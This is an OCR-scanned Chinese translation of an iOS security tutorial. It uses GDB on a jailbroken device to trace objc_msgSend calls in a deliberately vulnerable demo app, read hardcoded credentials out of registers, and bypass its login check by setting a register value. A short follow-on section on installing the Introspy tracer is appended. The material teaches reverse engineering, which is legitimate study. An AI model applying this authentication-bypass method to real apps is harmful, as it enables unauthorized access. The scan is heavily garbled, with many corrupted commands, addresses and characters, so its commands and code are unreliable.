#36] 
#0] 


80] 
80] 
824] 








; Oxla?74 





Objective-C 是 基于 消息 的 ， 任 何 时 候 一 有 消息 被 发 送 ，objc_msgSend 就 会 被 调用 。 


在 我 们 打印 出 的 loginButtonTapped: 的 汇编 代码 当中 ， 这 里 有 许多 的 objc_ msgSend 调 用 。 要 
找 出 这 个 调用 的 一 个 好 方法 就 是 查找 blx 指 令 。 在 你 看 到 blx 指 令 的 地 方 ， 你 可 以 确认 有 一 个 
objc msgSend 正 在 被 调用 。 


Breakpoint 3, @x@0@e95fe in -[ViewController loginButtonTapped:] ©) 
tgdb) disas 
Dump of assembler code for function -[ViewController loginButtonTapped:]: 
0x008e95f8 «-[ViewController loginButtonTapped:]4«8»: push {r7, Lr} 
a «-[ViewController LoginButtonTapped: ]+2>: r7, sp 
«-[ViewController LoginButtonTapped: ]+4>: ul sp, #40 


«-[ViewController loginButtonTapped: ]+6>: 1 rð, [sp, #36] 

| «-[ViewController LoginButtonTapped: ]+8>: t rl, [sp, #32] 

| «-[ViewController loginButtonTapped: ]+1@-: ré, r2 
«-[ViewController LoginButtonTapped: ]+12>: Oxeafdà <dyld_stub_objc_retain 
«-[ViewController LoginButtonTapped: ]+16>: ! rl, #6772 ; üxla?4 





当 有 新 方法 被 调用 ， 或 者 有 属性 (property) 被 访问 的 时 候 ，objc_ msgSend 就 会 被 调用 。 所 
以 ， 如 果 我 们 在 objc_msgSend 下 一 个 断 点 ， 我 们 可 以 打印 出 正 被 调用 的 方法 和 调用 这 个 方法 
的 对 象 ， 这 将 帮助 我 们 理解 app 的 整个 流程 。 我 们 已 经 在 本 系列 的 这 篇 文 草 中 学 习 过 Snoop-it 

能 够 找到 所 有 被 追踪 的 调用 。 要 找 出 正在 被 调用 的 方法 ， 我 们 首先 需要 查看 ARM 的 调用 约定 
(call convention) 。 下 面 是 从 Wikipedia 截 取 的 关于 ARM 调 用 约定 的 图 。 


ARM [edit] 
The standard ARM calling convention allocates the 16 ARM registers as: 
e r15 is the program counter. 
e rí4 is the link register. (The BL instruction, used in a subroutine call, stores the return address in this register). 
e r13 is the stack pointer. (The Push/Pop instructions in "Thumb" operating mode use this register only). 
e r12 is the Intra-Procedure-call scratch register. 
e r4 to r11: used to hold local variables. 
e rO to r3: used to hold argument values passed to a subroutine, and also hold results returned from a subroutine. 
If the type of value returned is too large to fit in ro to r3, or whose size cannot be determined statically at compile time, then the caller must allocate space for that value at run time, and pass a pointer to that 


space in r0. 


Subroutines must preserve the contents of r4 to r11 and the stack pointer. (Perhaps by saving them to the stack in the function prologue, then using them as scratch space, then restoring them from the stack 
in the function epilogue). In particular, subroutines that call other subroutines *must* save the return address in the link register r14 to the stack before calling those other subroutines. However, such subroutines 
do not need to return that value to ríá—they merely need to load that value into r15, the program counter, to return. 
The ARM stack is full-descending. I: 
This calling convention causes a "typical" ARM subroutine to 

e In the prolog, push r4 to r11 to the stack, and push the return address in r14, to the stack. (This can be done with a single STM instruction). 

e copy any passed arguments (in rO to r3) to the local scratch registers (r4 to r11). 

e allocate other local variables to the remaining local scratch registers (r4 to r11). 

e do calculations and call other subroutines as necessary using BL, assuming ro to r3, r12 and r14 will not be preserved. 

e put the result in rO 
e In the epilog, pull r4 to r11 from the stack, and pulls the return address to the program counter r15. (This can be done with a single LDM instruction). 


其 中 有 一 行 很 重要 。 
e rD to r3: used to hold argument values passed to a subroutine, and also hold results returned from a subroutine. 


因此 ， 我 们 可 以 给 每 一 个 objc_msgSend 设 置 断 点 ， 然 后 使 用 r0-r3 寄 存 器 的 值 找到 传递 给 这 个 
函数 的 参数 。 我 们 先 看 看 objc _msgSend 的 签名 。 下 面 是 Apple 官方 文档 的 截图 。 


objc msgSend 

Sends a message with a simple return value to an instance of a class. 
SEI 

Parameters 


self 
A pointer that points to the instance of the class that is to receive the message. 


op 
The selector of the method that handles the message. 
A variable argument list containing the arguments to the method. 


Return Value 
The return value of the method. 


Discussion 

When it encounters a — call, the compiler generates a call to one of the functions objc msgSend, objc ms ny obje_ msgSendSuper, or 

objc_msgSendSuper et. Messages sent to an object's —— Jena the s rico are sent using c c msgSendSu ; other messages are sent using objc msgSend. 
Methods that have raf structures as return values are sent using « > msgSendSuper stret and objc msgSen Fg ret. 

Availability 


Available in OS X v10.0 and later. 
Declared In 


ob 1c/message.n 


因此 这 个 函数 的 前 2 个 参数 是 Self 和 op，self 是 一 个 用 来 接收 这 个 消息 的 菜 个 类 的 实例 ，Op 是 
要 处 理 这 个 消息 的 方法 的 选择 器 (selector)。 选择 器 (selector) 是 关于 这 个 消息 的 签名 。 例 
如 ， 如 果 一 个 方法 的 原型 为 -(void)addOjects ToArray:(NSArray *)array， 那 么 它 的 签名 就 是 
addOjectsToArray:。 我们 也 知道 [0-r3 用 来 保存 传 递 给 了 予 程 序 的 参数 值 ， 因 此 我 们 可 以 推断 r0 
会 包含 self， 而 r1 会 包含 op 。 


我 们 通过 例子 来 理解 。 先 给 objc_msgSend 下 一 个 断 点 ， 然 后 继续 执行 知道 断 点 被 触发 。 


(C Mybreak objc msgsenc 
Breakpoint 2 at 0x34333f72 
(gdb) c 

Continuing. 


Breakpoint 2, @x34333f72 in objc msgSend () 
Cgdb) |l 





我 们 已 经 知道 ，r0 会 包含 一 个 用 来 接收 这 个 消息 的 菜 个 类 的 实例 ，r1 会 包 内 选择 器 ， 从 r2 开 始 
会 是 传递 给 方法 的 参数 。 不 过 ， 我 们 要 先 学 下 命令 X。X 代 表 检 查 — ， 会 以 多 种 格 
式 帮助 我 们 查看 内 和 存 。 我 们 能 够 制定 我 们 想 UEBER BARRERA 要 找 出 这 个 命令 的 所 有 xb 

项 ， 使 用 命令 help x。 


delp x 

Examine memory: x/FMT ADDRESS. 

ADDRESS is an expression for the memory address to examine. 

FMT is a repeat count followed by a format letter and a size letter. 

Format letters are o(octal), x(hex), d(decimal), u(unsigned decimal), 
t(binary), f(float), a(address), i(instruction), c(char) and s(string), 
TCOSType), A(floating point values in hex). 

Size letters are b(byte), h(halfword), w(word), g(giant, 8 bytes). 


The specified number of objects of the specified size are printed 
according to the format. 


Defaults for format and size letters are those previously used. 
Default count is 1. Default address is following last thing printed 
with this command or "print". 





我 们 先 检 查 r0。 我 们 知道 r0 会 包含 一 个 用 来 接收 这 个 消息 的 某 个 类 的 实例 ， 因 此 我 们 要 使 用 的 
格式 是 Xx/a。 我 们 在 r0 签 名 使 用 了 $， 因 为 我 们 想 要 查看 内 存 ， 因 此 使 用 $。 


üx3e88b4cc «OBJC CLASS, $ UIRoundedRectButton» 





我 们 可 以 看 到 a 的 一 个 实例 。 现 在 我 们 再 检查 下 r1 寄 存 器 的 
值 。 我 们 知道 它 包 选择 器 ， 例 如 ， 方 法 的 签名 。 这 是 一 个 字符 串 ， 因 此 我 们 使 用 x/s。 


Brx370984f6: "respondsToSelector:" 
Codb) fj 





ME’ RNR BR kART EAA o dX ART SE AUR ERT > AA AIEO A iR 25 48 
式 。 但 是 注意 到 选择 器 是 respondsToSelector: 用 常识 我 们 可 以 推断 参数 可 能 是 一 个 选择 器 > 
因此 我 们 再 次 使 用 X/s 来 检查 内 存 。 


"debugDescription" 





Mi de Mig pepe 。 从 方法 的 选择 器 我 们 可 以 看 到 ， 这 个 函数 只 有 一 个 参数 ， 
此 我 们 不 必 进 一 步 检 查 其 他 寄存 器 。 所 以 ， 现 在 我 们 可 以 说 正在 被 调用 的 方式 像 下 面 这 样 。 


Ij 


-[UlRoundedRectButton responds ToSelector:@selector(debugDescription)]; 


这 里 会 有 太 多 的 objc_msgSend 会 被 调用 ， 一 个 一 个 简单 会 非常 痛苦 。 因 此 ， 让 我 们 把 这 个 过 
: 自动 化 。 在 本 系列 的 [第 3 篇 [3] 文 章 中 ， 我 们 学 到 了 如 何 用 gdb 在 断 点 触发 的 时 候 打 印信 
° 我 们 这 样 也 用 用 。 


Type commands for when breakpoint 2 is hit, one per line. 
End with a line saying just "end". 
»x/a $r 


»x/s $rl1 


>C 
send 


(gdb) cf 





现在 输入 命令 Cc 继续 ， 你 可 以 看 到 所 有 被 调用 的 方法 。 这 可 以 告诉 我 们 很 多 这 个 应 用 的 内 部 信 


Oo 


(m 


`~ 


Continuing. 


Breakpoint 2, @x34333f72 in objc msgSend () 
üxZa8970: üx3e88Bb4cc «OBJC CLASS. $ UIRoundedRectButtorne 
üx3709857d: "class" 


Breakpoint 2, @x34333f72 in objc msgSend () 
@xz2a8970: @x3e88b4cc <0BJC_CLASS_$_UIRoundedRectButtorn> 
0x370984f6: "respondsToSelector:" 


Breakpoint 2, 0x34333f72 in objc msgSend () 
@x7a8970: üx3e88b4cc «OBJC CLASS. $ UIRoundedRectButtore 
0x3709857d: "class" 


Breakpoint 2, 0x34333f72 in objc msgSend () 
@x2a8970: @x3e88b4cc «OBJC CLASS, $ UIRoundedRectButton- 
0x370984cd: "debugDescription" 


Breakpoint 2, @x34333f72 in objc msgSend () 
0x2a28970: üx3e88b4cc «OBJC CLASS $ UlRoundedRectButton- 
0x370984de : "description" 


Breakpoint 2, 0x34333f72 in objc msgSend () 
üx2a8970: üx3eBB8b4cc «OBJC CLASS. $ UIRoundedRectButton- 
0x3709857d: "class" 


Breakpoint 2, 0x34333f72 in objc msgSend () 
üx3fao57cc «OBJC CLASS, $ NSMutableString»: üx3fa657e8 «0BJC METACLASS. $. NSMutableString- 
0x37097417: "stringWithFormat: " 


Breakpoint 2, 0x34333f72 in objc msgSend () 
üx3fa657cc «OBJC CLASS, $ NSMutableString-: üx3fa657e8 «0BJC METACLASS. $. NSMutableString- 
0x3780972cb: "allocWithzone:" 


Breakpoint 2, @x34333f72 in objc_msgSend Č} 
üx25ald0: Ox3fa65830 «OBJC CLASS $ NSPlaceholderMutableString» 
@x37d0187b: "initWithFormat: Locale:arguments:" 





让 我 们 试 试 以 Objective-C 类 似 的 语法 打印 出 这 些 东 西 。 我 们 将 要 使 用 苹果 中 的 
class_getName。 如 你 所 见 ， 它 需要 提供 类 对 象 作 为 参数 ， 因 此 我 们 传递 r0 给 它 。 


class getName 


Returns the name of a class. 


TE SU - i| e ommum |a "JJ ET m /F = | A 
PL. Im “a T z = “a E oum e h I E oum “a m 
const char * class getName {Class cis] 


Parameters 
cls 


A class object. 
Return Value 
The name of the class, or the empty string if c/s is Nil. 


Availability 


Available in OS X v10.5 and later. 
Declared In 


obj]c/runtime. 


Li ii t = ii 


现在 像 下 面 这 样 重 写 调用 命令 。 


(gdb) commands 

Type commands for when breakpoint 4 is hit, one per line. 
End with a line saying just "end". 

»printf "[Xs Xs]Xn",(char *)class getName(**$r8),$r1 


(gdb) c 


Continuing. 





输入 命令 c 继 续 ， 现 在 你 可 以 看 到 ， 信 息 是 更 可 读 的 方式 了 。 


(gdb) commands 

Type commands for when breakpoint 4 is hit, one per line. 
End with a line saying just "end". 

»printf "[Xs #s]\n", (char *)class.getName(**$r9),$r1 

>C 

»end 

(gdb) c 

Continuing. 


Breakpoint 4, @x34333f72 in objc msgSend () 
[NSObject self] 


Breakpoint 4, @x34333f72 in objc msgSend () 
[_NSCFConstantString class] 


Breakpoint 4, @x34333f72 in objc msgSend () 
[_NSCFConstantString length] 


Breakpoint 4, @x34333f72 in objc msgSend () 
[_NSCFConstantString getCharacters:range:] 


Breakpoint 4, @x34333f72 in objc msgSend () 
[NSPathStore?2 . fastCharacterContents] 


Breakpoint 4, @x34333f72 in objc msgSend () 
[NSPathStore?2 length] 


Breakpoint 4, @x34333f72 in objc msgSend () 
[NSPathStorez .fastCStringContents:] 





Breakpoint 4, @x34333f72 in objc msgSend () 


这 会 告诉 我 们 很 多 关于 应 用 内 部 发 生 什么 的 信息 。 在 接 下 来 的 文章 中 ， 我 们 将 使 用 本 文学 到 
的 东西 来 学 习 如 何 使 用 GDB 执 行 运行 时 操作 。 


本 文 原文 


本 文 我 们 将 看 看 如 何 使 用 GDB 来 对 iOS 应 用 进行 运行 时 分 析 。 在 前 面 的 文 草 中 ， 我 们 已 经 查 
看 了 如 何 使 用 Cycript 来 分 析 和 操作 iOS 应 用 的 aE. 。 我们 学 习 了 如 何 执行 method 

swizzling， 并 且 调 用 我 们 自己 的 方法 而 不 是 原来 的 实现 。 因 此 ， 为 什么 我 们 还 需要 GDB 呢 ? 
Cycript 并 不 运行 我 们 设置 断 点 ， 不 允许 在 茶 个 特定 指令 后 修改 变量 和 寄存 器 的 值 。 用 GDB > 
我 们 可 以 更 深入 应 用 ， 观 祭 底 层 的 汇编 指令 ， 操 作 寄 存 器 的 值 ， 因 此 可 以 完全 改变 程序 的 运 


Q 
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你 可 以 从 github 下 载 GDB-Demo。 然 后 确保 安装 和 运行 它 到 你 的 设备 上 。 这 个 例子 应 用 是 一 个 
简单 的 单 视图 应 用 ， 要 求 你 输入 用 户 名 和 黎 码 的 组 合 来 登入 。 然 后 它 在 本 地 验证 你 输入 的 凭 
和 证， 如果 用 户 名 / 冤 码 输入 正确 ， 它 会 让 你 登录 进去 。 


The authenticity of host '192.168.1.71 (192.168.1.71)' can't be established. 
| RSA key fingerprint is f9:51:bf:01:b6:e9:b7:99:bf:88:14:b9:fa:ed:69:58. 


Are you sure you want to continue connecting (yes/no)? yes 

Warning: Permanently added '192.168.1.71' (RSA) to the list of known hosts. 
| r00t6192.168.1.71's password: 

Prateeks-iPod:- root# fj 





一 旦 应 用 安装 到 了 设备 上 ，SSh 进 入 设备 。 


Mssh root@i92.168.1.71 
| The authenticity of host '192.168.1.71 (192.168.1.71)' can't be established. 
RSA key fingerprint is f9:51:bf:01:b6:e9:b7:99:bf:88:14:b9:fa:ed:69:58. 


| Are you sure you want to continue connecting Cyes/no)? yes 

| Warning: Permanently added '192.168.1.71' CRSA) to the list of known hosts. 

| ro0t€192.168.1.71's password: 

| Prateeks-iPod:- root# fj 然后 在 你 





的 设备 上 开启 GDB-Demo 这 个 应 用 。 在 GDB 中 ， 使 用 命令 attach GDB-Demo.PiD 附加 到 这 个 
运行 进程 ， 这 里 的 PID 是 GDB-Demo 应 用 的 进程 |D。 你 那里 的 PID 可 能 不 一 样 。 输 入 attach 
GDB-Demo 然 后 点 击 TAB。 就 会 给 出 你 要 追加 的 正确 的 进程 DD。 一 旦 你 按 了 enter，GDB 会 挂 
钓 进 这 个 运行 的 进程 。 


(gdb) 
Attaching to process 1438. 

Reading symbols for shared libraries . done 

Reading symbols for shared libraries warning: Could not find object file "/Users 
/prateekgianchandani/Library/Developer/Xcode/DerivedData/GDB-Demo-ekqgzzhtmz symc 
cdmdxf jhkomhds/Bui Ld/Intermediates/GDB-Demo.bui Ld/Debug-iphoneos/GDB -Demo . bui Ld/ 
Objects-normal/armv7/main.o" - no debug information available for "main.m". 


warning: Could not find object file "/Users/prateekgianchandani/Library/Develope 

r/Xcode/Deri vedData/GDB-Demo-ekqgzzhtmzsymccdmdxf jhkomhds/Bui Ld/Intermediates/GD 
B-Demo.build/Debug-iphoneos/GDB-Demo.bui ld/Objects-normal/armv?/AppDelegate.o" - 
no debug information available for "AppDelegate.m". 


warning: Could not find object file "/Users/prateekgianchandani /Library/Develope 
r/Xcode/Deri vedData/GDB-Demo-ekqgzzhtmzsymccdmdxf jhkomhds/Bui Ld/Intermediates/GD 
B-Demo.build/Debug-iphoneos/GDB-Demo.bui Ld/Objects -normal/armv7/ViewController.o 
" - no debug information available for "ViewController.m". 


warning: Could not find object file "/Applications/Xcode .app/Contents/Developer/ 
Toolchains/XcodeDefault.xctoolchain/usr/lib/arc/libarclite iphoneos .a(arclite.o) 
" - no debug information available for "arclite.m". 





从 上 一 篇 文章 我 们 已 经 知道 这 个 应 用 的 类 信息 。 我 们 知道 它 有 一 个 方法 叫做 


loginButtonTapped:。 因 此 我 们 给 它 设置 一 个 断 点 ， 然 后 输入 命令 c 来 继续 运行 这 个 应 用 。 
(gdb) break loginButtonTapped: 

Breakpoint 1 at üx7e422 

Cgdb) c 

Continuing. 





3L 4E dp AERE AS] P e 9E RB 2B > RE dh cM ILU o 
l (gdb) c 

Continuing. 

Reading symbols for shared libraries ... done 

| Reading symbols for shared libraries .. done 

Reading symbols for shared libraries ...... done 


Breakpoint 1, 8x60007e422 in -[ViewController loginButtonTapped:] () 
(gdb) Jj 





使 用 disas 来 打印 出 这 个 函数 的 汇编 信息 。 现 在 我 们 知道 验证 就 会 发 生 在 这 个 函数 内 部 ， 因 为 
我 们 从 这 个 应 用 的 类 信息 里 找 不 到 其 他 感 兴 趣 的 其 他 相关 信息 。 


Codb) di sas | 
Dump of assembler code for function -[ViewController loginButtonTapped:]: 


axoDO7e418 
axo 7e41a 
@xOO07e41c 
axo e420 
axe e422 
axo 7e424 
axaDd7e426 
axo? e428 
üxoDU7e42c 
üxODU7e430 
0x0007e434 
0x0007e436 
0x00076438 
0x0007e43c 
6xboo7 e446 
bxboo7 e442 
bxboo7 e446 
OxbO07e44a0 
axe e44c 
OxbO07e44e 
OxbO07 e450 
Oxbeo7e452 
Oxbee7 e454 
Oxbe07e456 
üxODU7e458 
üxoDU7e45a 
üxoDU7e45c 
0x0007e45e 
0x0007e400 
0x0007e462 
axo 7e406 
axo e468 
axo e4d6c 


«-[ViewController 
«-[ViewController 
«-[ViewController 
«-[ViewController 
«-[ViewController 
«-[ViewController 
«- [ViewController 
«- [ViewController 
«- [ViewController 
«-[ViewController 
«-[ViewController 
«-[ViewController 
«-[ViewController 
«-[ViewController 
«-[ViewController 
«-[ViewController 
«-[ViewController 
«-[ViewController 
«-[ViewController 
«-[ViewController 
«-[ViewController 
«-[ViewController 
«- [ViewController 
«- [ViewController 
«- [ViewController 
«-[ViewController 
«-[ViewController 
«-[ViewController 
«- [ViewController 
«-[ViewController 
«-[ViewController 
«-[ViewController 
«-[ViewController 
«-[ViewController 
«-[ViewController 
«-[ViewController 
«-[ViewController 


loginButtonTapped: ]--&» : 
loginButtonTapped: ]+2>: 
loginButtonTapped: ]--4» ; 
loginButtonTapped: ]--8» : 


loginButtonTapped: ]--16» : 
loginButtonTapped: ]+12>: 
loginButtonTapped: ]--14»: 
loginButtonTapped: ]+16>: 
loginButtonTapped: ]+2@>: 
loginButtonTapped: ]+24>: 
loginButtonTapped: ]+28>: 
loginButtonTapped: ]+3@>: 
loginButtonTapped: ]+32>: 
loginButtonTapped: ]+36>: 
loginButtonTapped: ]--48» : 
loginButtonTapped: ]+42>: 
loginButtonTapped: ]+46>: 
loginButtonTapped: ]4 56» : 
loginButtonTapped: ]452» : 
loginButtonTapped: ]454» : 
loginButtonTapped: ]+56>: 
loginButtonTapped: ]458» : 
loginButtonTapped: ]--68» : 
loginButtonTapped: ]+62>: 
loginButtonTapped: ]+64>: 
loginButtonTapped: ]+66>: 
loginButtonTapped: ]+68>: 
loginButtonTapped: ]+7@>: 
loginButtonTapped: ]+72>: 
loginButtonTapped: ]+74>: 
loginButtonTapped: ]+78>: 
loginButtonTapped: ]--86» : 
loginButtonTapped: ]--84» : 
loginButtonTapped: ]--88» : 
loginButtonTapped: ]492» : 
loginButtonTapped: ]494» : 
loginButtonTapped: ]498» : 


ir4, r5, r6, r7, Ir} 

r7, sp, #12 

rs, [sp, #-4]! 

sp, #112 

rð, [sp, #108] 
[sp, #104] 

rü, rz 

üOx7ffdà «dyld stub objc retain» 

rl, #7244 ; Oxlc4c 

rl, #0 ; @x@ 

rl, pc 

rl, [r1, $9] 
#8848 





; üxz290 


üx7ffd4 «dyld stub. objc retainAutoreleasedReturnValue» 
rl, #0 

rl, ¥0 ; @xd 
r2, 99368 

rz, 80 ; Ox 
r2, pc 

r3, #7170 

r3, #0 ; Ox 


; üx2498 





re «-[ViewController 


loginButtonTapped: ]+102>: 


r3, pe 











每 当 一 个 外 部 方法 或 者 属性 被 访问 的 时 候 ，objc_msgSend 就 会 被 调用 。 不 过 ， 在 任何 程序 中 
msgSend 都 会 被 调用 成 千 上 万 次 。 我 们 只 关心 和 这 个 函数 (loginButtonTapped:) 相关 的 

objo msgSend 调 用 。 因 此 ， 我 们 可 以 找 出 所 有 人 调用 objc msgSend 的 指令 的 地 址 ， 然 后 给 它 
设置 断 点 。 一 个 非常 简单 的 方法 就 是 寻找 blx 指 令 ， 注 意 它 (blx) 的 地 址 ， 然 后 为 它 设置 一 个 断 


End of assembler dump. 

gdb) break *blx 

No symbol "blx" in current context. 
(gdb) break *8x0007e428 

Breakpoint 3 at Ox7e428 

(gdb) b *6x0007e45e 


Breakpoint 4 at Ox7e45e 
(gdb) b *6x0007e462 
Breakpoint 5 at Ox7e462 
(gdb) b *@x0007e49a 
Breakpoint 6 at @x7e49a 





现在 我 已 经 为 这 个 函数 调用 objc msgSend 的 入 口 设 置 了 断 点 。 现 在 我 们 一 个 一 个 的 来 看 
objc msgSend 指 令 ， 打 印 出 寄存 器 的 值 ， 看 看 是 否 有 感 兴 趣 的 。 我 们 将 要 打印 出 每 个 
objc msgSend 调 用 的 r1 的 值 。 如 果 没 有 什么 感 兴趣 的 ， 输 入 命令 C 继 续 直 到 下 一 个 断 点 蚀 
发 。 


(gdb) c 
Continuing. 


Breakpoint 3, 8x0007e428 in -[ViewController loginButtonTapped:] © 
(gdb) x/s $r1 

üx7f743: "loginButtonTapped: " 

Cgdb) x/s $r1 

Gx7f743: "loginButtonTapped: " 

(gdb) c 

Continuing. 


Breakpoint 4, 8x0007e45e in -[ViewController loginButtonTapped:] © 
(gdb) x/s $r1 

0x320e89ef : "text" 

Cgdb) x/s $r1 

üx320eB9ef : "text" 

(gdb) c 

Continuing. 


Breakpoint 5, 8x0007e462 in -[ViewController loginButtonTapped:] (© 
(gdb) x/s $r1 

@xdb34000: “@OGSAUTORELEASE ! 4&4 rým" 

(gdb) c 

Continuing. 


Breakpoint 6, 8x6007e49a in -[ViewController loginButtonTapped:] () 
Cgdb) x/s $r1 

0x37097f2f ; "isEqualToString:" 

《gdb) Jf 





这 里 有 些 有 意思 的 东西 。 如 果 我 们 看 看 上 图 的 底部 ， 我 们 会 看 到 方法 isEqualToString: 被 调用 
了 。 因 此 这 是 一 个 和 特定 字符 串 的 比较 。 利 用 从 上 一 篇 文章 获得 的 知识 我 们 可 以 知道 寄存 器 
[2 会 包含 传递 给 这 个 函数 的 参数 。 并 且 ， 如 果 你 有 编写 Objective-C 代 码 的 经 验 ， 你 会 知道 每 
个 Objective-C 的 对 象 都 是 一 个 指针 。isEqualToString: 这 个 函数 也 同样 接收 一 个 字符 串 指 针 作 
为 参数 ， 保 存在 [2 寄存 器 中 。 要 找 出 这 个 对 象 的 值 ，GDB 有 一 个 特定 的 命令 po， 能 够 打印 出 
这 个 寄存 器 中 的 指针 的 值 。 


erro srz | 
Admin 


因此 ， 这 个 正 被 比较 的 字符 事 是 Admin”。 这 看 起 来 像 是 用 户 名 。 看 起 来 工作 已 经 完成 了 一 
半 。 你 也 可 以 用 如 下 图 的 方式 打印 出 r2 的 值 。 








现在 更 明智 的 做 法 就 是 重新 在 应 用 中 把 用 户 名 输入 为 Admin。 这 是 因为 执行 流程 可 能 还 走 不 到 
ERAN (AANA PEAS) 。 因 此 ， 让 我 们 输入 Admin 作 为 用 户 名 ， 输 入 任意 的 东 
西 作 为 移 码 。 让 我 们 再 次 设置 断 点 ， 然 后 看 看 我 们 是 否 能 够 找 出 冤 码 。 在 经 过 一 段 做 同样 事 
情 的 时 间 之 后 ， 断 点 将 会 在 jiSEqualToString: 被 调用 的 时 候 被 触发 。 打 印 出 [2 的 值 ， 可 以 看 

&| > %4 52 HELLOIOSAPPLICATIONEXPERTS 。 


(gdb) xs $r1 
0x37097f2f : "isEqualToString:" 
(gdb) po $r2 


HELLOIOSAPPLICATIONEXPERTS 
(gdb) ff 
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You are now logged in ! 


另 一 个 做 到 同样 事情 的 方法 就 是 操作 寄存 器 的 值 。 在 汇编 代码 中 ， 我 们 可 以 看 到 有 2 个 调用 
cmp 指 令 的 地 方 。 


0x0007e528 «-[ViewController LoginButtonTapped: ]+272>: 

6x0007e52a «-[ViewController loginButtonTapped: ]+274>: 

6x0007e52c «-[ViewController loginButtonTapped: ]+276>: 

6x0007e52e «-[ViewController loginButtonTapped: ]+278>: 

0x00076532 «-[ViewController loginButtonTapped: ]+282>: 

0x0007e534 «-[ViewController loginButtonTapped: ]+284>: ! 
0x00076e536 «-[ViewController LoginButtonTapped:]+286>: 5 [sp, #76] 


0x0007e4a8 «-[ViewController loginButtonTapped:]-136»: and.w r2, r1, #1 : üx1 
0x0007e4a4 «-[ViewController loginButtonTapped:]-148»: strb.w r2, [sp, #92] 
OxeBÜ7e4a8 «-[ViewController LoginButtonTapped: ]+144>: 
6x0007e4aa «-[ViewController loginButtonTapped:]-146»: str rl, (sp, #76] 
@x@O07e4ac «-[ViewController loginButtonTapped:]+148>: beg.n @x7e538 «-[ViewController LoginButtonTapped: ]+288> 
0x0007e4ae UNE cxi rarae og ds ]-150»: movw rọ, #7114 : Oxlbca 
na oginButton 3 : movt rü., #0 : xü 


在 这 两 个 地 方 ，r0 寄 存 器 的 值 都 与 0 做 比较 ， 然 后 根据 比较 结果 做 决定 。 让 我 们 为 这 两 个 地 方 
都 设置 一 个 断 点 然后 继续 运行 应 用 。 





End of assembler dump. 
(gdb) b *6x0007e4a8 
Breakpoint 14 at 60x7e4a8 
(gdb) b *@x8007e52c 


Breakpoint 15 at 6Ox7e52c 
(gdb) c 
Continuing. 





一 旦 断 点 触发 ， 设 置 [0 寄 存 器 的 值 为 1. 你 可 以 通过 命令 set $r0 =1 做 到 。 在 另 一 个 地 方 做 同样 
的 事情 然后 继续 运行 应 用 。 你 会 看 到 你 成 功 登 陆 ， 即 使 你 没有 输入 任何 用 户 名 /密码 组 合 。 


(gdb) c 
Continuing. 


Breakpoint 14, 8x0007e4a8 in -[ViewController loginButtonTapped:] () 
= 

(gdb) c 

Continuing. 


Breakpoint 15, @x@@@7e52c in -[ViewController loginButtonTapped:] () 
(gdb) set $r@ = 1 

(gdb) c 

Continuing. 
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You are now logged in ! 


顺便 说 一 下 ， 下 面 是 我 们 破解 的 loginButtonTapped: 的 代码 。 


- (IBAction)loginButtonTapped:(id)sender { 


1 

2. if([ . usernameTextField.text isEqualToString:Q'"Admin"] && [ passwordTextField.text isEq 
3. [self performSeguewithIdentifier:@"adminPage" sender:self]; 

4. selse{ 

5. [E[UIAlertView alloc] initWwithTitle:Q"Error" message:@"Incorrect Username or password" 
6 
7 





本 文 我 们 查看 了 如 何 通过 GDB 在 运行 时 操作 应 用 的 执行 流程 。 在 整个 逻辑 都 在 一 个 函数 内 部 
的 情况 下 ， 关 于 GDB 的 知识 特别 有 用 ， 因 为 我 们 不 能 够 使 用 Cycript 的 method swizzling 技 术 。 
学 握 好 GDB 和 和 ARM 汇编 的 知识 ， 修 改 和 操作 应 用 的 执行 流程 的 能 力 只 受 你 的 想象 力 限 制 。 


AUR X iDOS 应 用 程序 安全 (22)- 使 用 GDB 进 行 运行 时 分 析 和 操作 


#6 iOS 应 用 动态 分 析 下 的 更 多 文章 


本 文 我 们 将 看 看 如 何 使 用 Introspy 对 iOS 应 用 进行 黑 盒 测 试 。lntrospy 由 1ISEC partners H È * 
其 github 地 址 在 这 ° Introspy 由 两 个 单独 的 模块 组 成 :一 个 追踪 器 ， 一 个 分 析 医 。 它 古 分 析 
iOS 应 用 程 序 安全 晕 无 疑问 的 最 强大 工具 之 一 。 


步 就 是 在 你 的 设备 上 安装 Introspy 追 踪 器 。 你 可 以 在 这 下 载 到 其 deb 包 。 下 载 成 功 之 后 ， 
pides 到 你 的 设备 上 。 下 图 展示 了 上 面 提 到 的 步骤 需要 执行 的 操作 。 





get https://www.dropbox.com/s/z5cwak5wti3zsvd/com.isecpartners.introspy-v0.3-i0S. 6.1.deb 
--2013-09-17 14:47:55-- https://www.dropbox. com/s/z5cwqk5wti 3zsvd/com. isecpartners.introspy-v0.3-i0S. 6.1.deb 
Resolving www.dropbox.com... 199.47.216.170 
Connecting to www.dropbox.com|199.47.216.1701:443... connected. 
HTTP request sent, awaiting response... 302 FOUND 
Location: https://dl.dropboxusercontent . com/s/z5cwqk5wti3zsvd/com.isecpartners.introspy-v0.3-10S. 6.1.deb?token. hash-AAHQQARARK2ZYEBLQXOXRtOR239nk50Qj 
TdYbyORuSiHn8A [following] 
--2013-09-17 14:47:57-- https://d1.dropboxusercontent.com/s/zScwqk5wti3zsvd/com.isecpartners. introspy-v@.3-i0S_6.1.deb?token_hash=AAHQQARARK2ZYEBLQ 
XOXRtOR239nk5Qj TdYbyORuSiHn8A 
Resolving dl.dropboxusercontent.com... 50.17.220.219 
Connecting to dl.dropboxusercontent.com|50.17.220.2191:443... connected. 
HTTP request sent, awaiting response... 200 OK 
Length: 34886 (34K) [application/x-debian-package] 
Saving to: 'com.isecpartners.introspy-v0.3-i0S. 6.1.deb.2" 





chandani&Prateeks -MacBook-Pro 
com.isecpartners.introspy-v0.3-i0S. 6.1.deb root@10.0.1.58:~ 
root@10.0.1.58's password: 
com. isecpartners. introspy-v@.3-i10S8_6.1.deb 100% 34KB 34.1KB/s 00:00 


roote10.0.1.58 
root@10.0.1.58's password: 
ein) Code Hlavusdidpkg -i com.isecpartners.introspy-v0.3-iOS 6.1.deb 
(Reading database ... 7404 files and directories currently installed.) 
Preparing to replace com.isecpartners.introspy 0.3.0-1 (using com.isecpartners.introspy-v@.3-i0S_6.1.deb) ... 
Unpacking replacement com.isecpartners.introspy ... 
Setting up com.isecpartners.introspy (0.3.0-1) ... 


一 旦 追踪 器 安装 好 了 ， 重 启 你 的 设备 。 到 设置 应 用 
iPod T 2:51 PM - - = 





> 你 会 看 到 一 个 关于 Introspy 的 不 同 区 块 。 






























































Store > 


Developer > 


Introspy - Apps > 


Introspy - Settings > 
Mouse > 
Veency > 


Angry Birds > 





Angry Birds > 
